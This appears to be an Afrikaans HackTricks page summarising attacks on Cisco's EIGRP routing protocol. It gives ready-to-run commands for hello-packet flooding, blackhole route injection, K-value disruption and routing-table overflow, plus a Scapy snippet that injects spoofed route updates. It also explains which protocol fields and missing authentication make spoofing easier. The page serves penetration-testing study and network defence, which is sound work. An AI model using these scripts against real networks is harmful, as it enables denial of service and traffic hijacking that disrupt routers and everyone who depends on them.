EIGRP Aanvalle
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Dit is ’n samevatting van die aanvalle wat in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Kyk daarna vir meer inligting.
Fake EIGRP Neighbors Attack
- Doel: Om router-CPU’s te oorlaai deur hulle met EIGRP hello packets te oorstroom, wat moontlik tot ’n Denial of Service (DoS)-aanval kan lei.
- Gereedskap: helloflooding.py-script.
- Uitvoering:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Parameters:
--interface: Spesifiseer die netwerkinterface, bv.eth0.--as: Definieer die EIGRP autonomous system nommer, bv.1.--subnet: Stel die subnet-ligging, bv.10.10.100.0/24.
EIGRP Blackhole Attack
- Doel: Om netwerkverkeer te ontwrig deur ’n valse roete in te spuit, wat lei tot ’n blackhole waar die verkeer na ’n nie-bestaande bestemming gestuur word.
- Gereedskap: routeinject.py-script.
- Uitvoering:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Parameters:
--interface: Spesifiseer die attacker se stelsel-interface.--as: Definieer die EIGRP AS nommer.--src: Stel die attacker se IP-adres.--dst: Stel die teiken subnet IP.--prefix: Definieer die mask van die teiken subnet IP.
Abusing K-Values Attack
- Doel: Om deurlopende ontwrigtings en herkoneksies binne die EIGRP-domein te veroorsaak deur veranderde K-values in te spuit, wat effektief tot ’n DoS-aanval kan lei.
- Gereedskap: relationshipnightmare.py-script.
- Uitvoering:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Parameters:
--interface: Spesifiseer die netwerkinterface.--as: Definieer die EIGRP AS nommer.--src: Stel die IP-adres van ’n legitieme router.
Routing Table Overflow Attack
- Doel: Om die router se CPU en RAM te belas deur die routing table te oorstroom met talle valse roetes.
- Gereedskap: routingtableoverflow.py-script.
- Uitvoering:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Parameters:
--interface: Spesifiseer die netwerkinterface.--as: Definieer die EIGRP AS nommer.--src: Stel die attacker se IP-adres.
Protokolnotas nuttig vir aanvalle
- HELLO packets carry K-values and neighbors only form when they match. Dit is die basis vir K-value mismatch/relationship disruption-aanvalle en waarom onversoenbare K-values adjacensie voorkom.
- The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, dus passiewe captures openbaar die presiese waardes wat op die segment gebruik word.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy bevat ’n EIGRP contrib-laag met TLVs soos EIGRPParam en EIGRPIntRoute, wat genoeg is om UPDATEs vir route injection te skep. Voorbeeld aangepas vanaf die davidbombal/scapy EIGRP route injection script:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
Diezelfde repo bevat vinnige “fake neighbor” skripte wat ’n werklike EIGRP-pakket sniff en dit replay met ’n spoofed source IP om phantom neighbors te skep (nuttig vir CPU/neighbor-table druk).
- Scapy EIGRP contrib-dokumentasie: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Voorbeeldskripte: https://github.com/davidbombal/scapy
Routopsy & NSE Helpers
- Routopsy bou ’n virtual-router aanvalslab (FRRouting + Scapy) en sluit DRP-aanvalle in wat jy kan aanpas vir EIGRP-toetse. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Nmap’s NSE het ’n klein
eigrp-biblioteek vir die ontleding/generering van ’n substel van EIGRP-pakkette. https://nmap.org/nsedoc/lib/eigrp.html
Authentication Recon
- EIGRP named mode supports HMAC-SHA-256 authentication via
authentication mode hmac-sha-256 .... As dit geaktiveer is, moet vervaardigde pakkette met die korrekte sleutel geauthentiseer word; as dit nie geaktiveer is nie, maak dit spoofing/injection makliker om uit te voer.
References
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.


